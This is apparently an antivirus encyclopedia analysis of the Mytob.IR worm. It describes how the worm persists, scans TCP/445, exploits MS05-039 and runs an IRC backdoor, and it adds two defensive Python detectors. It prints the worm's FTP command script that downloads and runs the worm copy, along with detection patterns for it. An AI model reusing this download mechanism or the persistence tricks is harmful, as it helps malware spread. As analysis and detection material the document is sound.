Threat Encyclopedia



Aliases: W32/Zotob.worm.b, W32/Zotob.B, W32/Zotob-B
Type: Worm
Affects: Windows 2000

Mytob.IR is a 15,386-byte worm that is runtime-packed with UPack. Upon execution, the worm copies itself into the System32 folder as "csm.exe".
The worm creates a mutex named "B-O-T-Z-O-R" so that only one instance of the worm runs on a machine at a time.

The worm adds the following registry value so that it runs every time Windows is started:

"csm Win Updates" = "csm.exe"

"csm Win Updates" = "csm.exe"

Note: The worm continuously checks for the presence of these registry values and recreates them if they are missing.

Mytob.IR also modifies the following registry value:

"Start" = "4"

Changing this value lowers the security settings of the compromised system.

Note: This disables the Shared Access service on Windows NT-based systems.

The worm generates random IP addresses and attempts to connect to TCP port 445 on each of them in order to exploit the Plug and Play buffer overflow vulnerability (see MS05-039). If the exploit succeeds, shellcode runs on the target machine and instructs it to connect back to the attacking host to retrieve a copy of the worm. (The copy is transferred to the target over an FTP connection to the attacking host's FTP server, driven by the 2pac.txt FTP command file.)

Note: The worm creates its own task named "SCAN" for this purpose.

The 2pac.txt file contains the following FTP commands:

open %IP% %TCP port%
user hell rulez
get haha.exe

The worm runs FTP.EXE locally on the compromised system to retrieve a copy of the worm named "haha.exe" from the infecting system, and executes that file once the download completes.

Note: The FTP server listens on port 33333.
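The propagation pattern just described (a burst of connections to TCP/445 on many unrelated addresses, followed by the victim reaching back to the infecting host on TCP/33333) is visible at the network boundary. The following detector is an added example, not code from the original write-up: it runs over constructed, syslog-like firewall lines of the form "timestamp src dst dport proto action", and the scan threshold and time window are lab assumptions, not values from the analysis.

```python
"""Flag Mytob.IR/Zotob-style propagation in firewall connection logs.

Added example. Log format, thresholds and sample addresses are constructed
assumptions; the port numbers (445 for the MS05-039 exploit attempt, 33333
for the worm's FTP listener) come from the analysis above.
"""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts src dst dport proto action")

SMB_PORT = 445          # Plug and Play exploit traffic (MS05-039) rides on SMB
WORM_FTP_PORT = 33333   # FTP listener the worm opens on the infecting host

# Constructed sample log: 10.1.2.3 sweeps six unrelated /32s on 445 inside
# two seconds, one internal victim (10.1.2.77) answers, then the victim
# fetches haha.exe from 10.1.2.3:33333. 10.1.2.50 is benign file-server use.
SAMPLE_LOG = """\
2005-08-14T10:00:01 10.1.2.3 87.54.2.9 445 tcp deny
2005-08-14T10:00:01 10.1.2.3 203.11.7.40 445 tcp deny
2005-08-14T10:00:02 10.1.2.3 12.99.130.5 445 tcp deny
2005-08-14T10:00:02 10.1.2.3 66.4.18.221 445 tcp deny
2005-08-14T10:00:03 10.1.2.3 145.80.9.2 445 tcp deny
2005-08-14T10:00:03 10.1.2.3 10.1.2.77 445 tcp allow
2005-08-14T10:00:05 10.1.2.77 10.1.2.3 33333 tcp allow
2005-08-14T10:00:06 10.1.2.50 10.1.2.10 445 tcp allow
2005-08-14T10:00:07 10.1.2.50 10.1.2.10 445 tcp allow
2005-08-14T10:00:08 10.1.2.50 93.184.216.34 80 tcp allow
"""


def parse_line(line):
    ts, src, dst, dport, proto, action = line.split()
    return Event(datetime.fromisoformat(ts), src, dst, int(dport), proto, action)


def find_scanners(events, min_targets=5, window=timedelta(seconds=60)):
    """Return {src: distinct_targets} for sources that touched at least
    min_targets distinct addresses on TCP/445 inside any sliding window."""
    by_src = defaultdict(list)
    for e in events:
        if e.proto == "tcp" and e.dport == SMB_PORT:
            by_src[e.src].append(e)
    scanners = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        start, best = 0, 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:
                start += 1
            best = max(best, len({e.dst for e in evs[start:end + 1]}))
        if best >= min_targets:
            scanners[src] = best
    return scanners


def find_callbacks(events, scanners):
    """Connections to the worm's FTP port as (src, dst, dst_is_known_scanner).
    A callback whose destination is a flagged scanner is the 'get haha.exe'
    stage, i.e. src is very likely a fresh victim."""
    return [(e.src, e.dst, e.dst in scanners)
            for e in events if e.proto == "tcp" and e.dport == WORM_FTP_PORT]


def detect(log_text, **kw):
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    scanners = find_scanners(events, **kw)
    return {"scanners": scanners, "callbacks": find_callbacks(events, scanners)}


if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The sliding window matters in practice: a worm that sweeps random addresses produces many distinct destinations in seconds, while a legitimate client re-contacts the same file server repeatedly, so counting distinct destinations per window rather than raw connection counts keeps the benign host (10.1.2.50 above) out of the alert.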

The worm attempts to overwrite the hosts file with the following data to block access to these sites:

The worm also provides IRC backdoor functionality with the following capabilities:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components
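The host-side artifacts listed throughout this entry (the dropped csm.exe, the B-O-T-Z-O-R mutex, the "csm Win Updates" autorun value, the disabled Shared Access service, the FTP listener on 33333, the scripted FTP.EXE download and the 2pac.txt command file) can be checked together during triage. The script below is an added example and not code from the original write-up; it runs over a constructed artifact snapshot whose dictionary layout is an assumption about how a collection tool might export its results, the autorun key path is a placeholder because this entry does not reproduce it, and mapping the "Start"="4" change to the SharedAccess service is inferred from the note that Shared Access is disabled.

```python
"""Triage a host artifact snapshot against the Mytob.IR indicators above.

Added example. Snapshot shape, sample paths and the autorun key placeholder
are constructed; indicator values (file name, mutex, value name, port,
2pac.txt contents) are taken from the analysis.
"""
import re

MUTEX_NAME = "B-O-T-Z-O-R"
DROPPED_FILE = re.compile(r"\\system32\\csm\.exe$", re.IGNORECASE)
AUTORUN_NAME, AUTORUN_DATA = "csm Win Updates", "csm.exe"
WORM_FTP_PORT = 33333
FTP_SCRIPT_LINES = (
    re.compile(r"^open\s+\S+\s+\d+$"),      # open %IP% %TCP port%
    re.compile(r"^user\s+hell\s+rulez$"),   # user hell rulez
    re.compile(r"^get\s+haha\.exe$"),       # get haha.exe
)

# Constructed sample snapshots (not real collections).
INFECTED_HOST = {
    "files": [r"C:\WINNT\system32\csm.exe", r"C:\WINNT\system32\2pac.txt"],
    "mutexes": ["B-O-T-Z-O-R", "benign-app-mutex"],
    "autoruns": {"HKLM\\<Run key, placeholder>": {"csm Win Updates": "csm.exe"}},
    "services": {"SharedAccess": {"Start": 4}},   # 4 = disabled (assumption)
    "tcp_listeners": [135, 445, 33333],
    # "-s:" is ftp.exe's script-file switch; the command line is constructed
    "processes": [r"C:\WINNT\system32\csm.exe", "ftp.exe -s:2pac.txt"],
    "text_files": {"2pac.txt": "open 10.1.2.3 33333\nuser hell rulez\nget haha.exe\n"},
}
CLEAN_HOST = {
    "files": [r"C:\WINNT\system32\cmd.exe"],
    "mutexes": ["benign-app-mutex"],
    "tcp_listeners": [135, 445],
    "processes": ["explorer.exe"],
}


def check_ftp_script(text):
    """True when a text file has the three-line shape of the worm's 2pac.txt."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    return len(lines) == 3 and all(p.match(l) for p, l in zip(FTP_SCRIPT_LINES, lines))


def triage(snapshot):
    """Return the list of indicators matched in the snapshot."""
    hits = []
    if any(DROPPED_FILE.search(p) for p in snapshot.get("files", [])):
        hits.append("file:system32\\csm.exe")
    if MUTEX_NAME in snapshot.get("mutexes", []):
        hits.append("mutex:" + MUTEX_NAME)
    for key, values in snapshot.get("autoruns", {}).items():
        if values.get(AUTORUN_NAME, "").lower() == AUTORUN_DATA:
            hits.append("autorun:" + key)
    if snapshot.get("services", {}).get("SharedAccess", {}).get("Start") == 4:
        hits.append("service:SharedAccess disabled")
    if WORM_FTP_PORT in snapshot.get("tcp_listeners", []):
        hits.append("listener:tcp/33333")
    for cmd in snapshot.get("processes", []):
        if re.search(r"\bftp(\.exe)?\b.*-s:", cmd, re.IGNORECASE):
            hits.append("process:scripted ftp.exe (" + cmd + ")")
    for name, text in snapshot.get("text_files", {}).items():
        if check_ftp_script(text):
            hits.append("ftp_script:" + name)
    return hits


def verdict(hits):
    """The mutex or the dropped file alone is conclusive; weaker indicators
    (a port, a scripted ftp.exe) need a second one to corroborate."""
    strong = any(h.startswith(("mutex:", "file:")) for h in hits)
    return "infected" if strong or len(hits) >= 2 else "clean"


if __name__ == "__main__":
    for label, snap in (("infected", INFECTED_HOST), ("clean", CLEAN_HOST)):
        found = triage(snap)
        print(label, verdict(found), found)
```

Because the worm recreates its autorun values when they are removed, a triage that reports "autorun present" after a manual cleanup is expected rather than surprising; the mutex and the running csm.exe are the indicators to act on first.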

The worm also contains the following text:

.... Made By .... Greetz to good friend ..... Based On ....
MSG to avs: the first av who detect this worm will be the first killed in the next 24hours!!!

It tries to connect to the IRC server

History: Analysis and Write-up by: Michael St. Neitzel